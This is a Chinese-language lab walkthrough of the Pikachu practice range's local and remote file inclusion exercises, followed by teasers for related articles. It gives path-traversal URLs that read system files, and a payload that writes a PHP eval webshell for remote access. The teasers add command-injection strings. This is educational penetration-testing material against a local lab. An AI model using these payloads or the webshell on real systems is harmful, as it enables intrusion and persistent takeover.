Pikachu靶场--文件包含

2024-06-18 19:04
文章标签 pikachu 靶场

本文主要是介绍Pikachu靶场--文件包含,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

参考借鉴

Pikachu靶场之文件包含漏洞详解_pikachu文件包含-CSDN博客

文件包含(CTF教程,Web安全渗透入门)__bilibili

File Inclusion(local) 

查找废弃隐藏文件

随机选一个然后提交查询

URL中出现filename=file2.php

 filename是file2.php,其他文件名可能是filex.php(x是数字)

发现文件名确实是file1.php~file5.php

这套文件里可能有废弃或者隐藏的文件,用burpsuite进行爆破

爆破位置设置为文件名中的数字

payload设置为Numbers,从6到100,步长为1,然后攻击

不同长度的结果有三个,分别代表file6.php、file7.php、file10.php

把上面四个文件名都在浏览器地址栏试一下

发现file6.php是个包含用户名和密码的隐藏文件

file7.php返回了报错,通过这个报错可以知道,文件包含的函数是include()以及包含的文件路径,file10.php也是如此

        

读取不同文件夹文件

由上图可以看出网站根目录是:E:\phpStudy\phpstudy_pro\WWW\     

在此目录下写入一个shell.txt格式的php代码

内容为:<? phpinfo();?>

由于路径参数中有个固定的include/,因此就不能用绝对路径,结合报错信息中泄露的结合报错信息中泄露的fi_local.php文件位置,算出相对路径为 ../../../shell.txt

payload:

http://127.0.0.1/vul/fileinclude/fi_local.php?filename=../../../shell.txt&submit=提交查询

成功读取文件 

         

读取系统文件

结合报错信息中泄露的fi_local.php文件位置,算出相对路径为 C:/../../../../windows/win.ini

payload:

http://127.0.0.1/vul/fileinclude/fi_local.php?filename=C:/../../../../Windows/win.ini&submit=提交查询

成功读取文件 

                

File Inclusion(remote)

allow_url_include=On

修改该目录下的文件  phpstudy_pro\Extensions\php\php7.3.4nts\php.ini

修改文件

重启服务 

测试本地文件包含

发现url中把include()函数的完整参数给出来了,所以除了远程文件包含,

还可以本地文件包含,使用绝对路径

将filename更改为上一关创建的shell.txt的绝对路径

成功读取文件

        

包含有木马的文件

在fi_remote.php文件的同级目录下新建一个文件shell.php,并将一句话木马写入shell.php,将上题添加的shell.txt的文件内容更改为:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[caker])  ?> ' ); ?>

payload:

http://127.0.0.1/vul/fileinclude/fi_remote.php?filename=E:\phpStudy\phpstudy_pro\WWW\shell.txt&submit=提交查询

没有回显 

目录查看发现shell.php已经写入, 可以用蚁剑进行连接

这篇关于Pikachu靶场--文件包含的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1072842

相关文章

【网络安全的神秘世界】搭建dvwa靶场

🌝博客主页:泥菩萨 💖专栏:Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具 下载DVWA https://github.com/digininja/DVWA/blob/master/README.zh.md 安装DVWA 安装phpstudy https://editor.csdn.net/md/?articleId=1399043

Pikachu靶场--CRSF

借鉴参考 CSRF跨站请求伪造(CTF教程,Web安全渗透入门)_bilibili pikachu靶场CSRF之TOKEN绕过_csrf token绕过的原理-CSDN博客 CSRF(get) 发现需要登录 查看提示,获取username和password  选择一个用户进行登录 选择修改个人信息  修改信息的过程中利用BP抓包  抓包成功-->相关工具--

xss.haozi.me靶场通关参考

url:https://xss.haozi.me/ 文章目录 0x000x010x020x030x040x050x060x070x080x090x0A0x0B0x0C00xD00xE00xF0x100x110x12 0x00 先看js代码,第一关给你热热手,没给你加过 payload: <script>alert(1)</script> 0x01 这关给你限制了把

红日靶场实战一 - 学习笔记

最近在学习红蓝对抗,如果有兴趣的可以多关注。 目录 环境搭建 靶场链接 配置网络 攻击机kali网络 配置win7 web服务器网络 配置winserver 2008网络(DC域控) 配置win2003/win2k3网路(域成员) IP配置情况 外网突破 信息收集 phpmyadmin后台getshell 尝试into outfile导入木马 利用mysql日志文件写入

Pikachu靶场--RCE

exec"ping" 输入IP地址查看页面反应 可以在IP地址的后面拼接我们想要执行的命令 127.0.0.1 & ipconfig                127.0.0.1 && type C:\Windows\win.ini 127.0.0.1 | systeminfo 127.0.0.1 && net user 命令连接符  &命令1和命令2正确都能执行; 当命令

burp靶场xss漏洞(中级篇)上

靶场地址 http://portswigger.net/web-security/all-labs#cross-site-scripting 第一关:DOM型(使用document.write函数) 1.点击随机商品后找到搜索框,后在URL中添加storeId查询参数,并输入一个随机字母数字字符串作为其值 2.在浏览器中,注意到随机字符串出现在选项表中 3.更改URL,在s

vulnhub靶场-xxe打靶教程

目录 靶机导入 信息收集 发现IP 端口扫描 目录扫描 漏洞利用 靶机下载地址:XXE Lab: 1 ~ VulnHub 靶机导入 导入虚拟机 开启虚拟机 信息收集 发现IP arp-scan -l 发现靶机IP是192.168.202.150 端口扫描 使用nmap进行扫描 nmap -sS -A 192.168.202.150

Burp Suite使用及BruteForc_test靶场实战

简介 Burp Suite是用于攻击和测试Web应用程序安全性的集成平台,包含多个协同工作的工具,支持信息共享与复杂攻击。设计有加速攻击流程的接口,所有工具共享强大框架,处理HTTP消息、持久性、认证、代理、日志和警报。主要用于安全性渗透测试,功能包括拦截修改请求、扫描漏洞、暴力破解表单和执行随机性检查等,提升测试效率。 安装与配置 软件下载地址: https://portswigge

Pikachu上的CSRF以及NSSCTF上的[NISACTF 2022]bingdundun~、 [SWPUCTF 2022 新生赛]xff

目录 一、CSRF CSRF(get) login  CSRF(post) CSRF Token  二、CSRF的相关知识点  (1)什么是CSRF? (2)工作原理 (3)CSRF漏洞形成的条件 1、用户要在登录状态(即浏览器保存了该用户的cookie) 2、用户要访问攻击者发的恶意url链接才行 (4)与XSS的区别 (5)CSRF的防御 三、NSSCTF上的题 在

vuInhub靶场实战系列--Kioptrix Level #4

免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。 目录 免责声明前言一、环境配置1.1 靶场信息1.2 靶场配置 二、信息收集2.1 主机发现2.1.1 netdiscover2.1.2 arp-scan主机扫描 2.2 端口扫描2.3 指纹识别2.4 目录扫描2.4.1 dirb目录扫描2.4.2 dirsearch目录扫描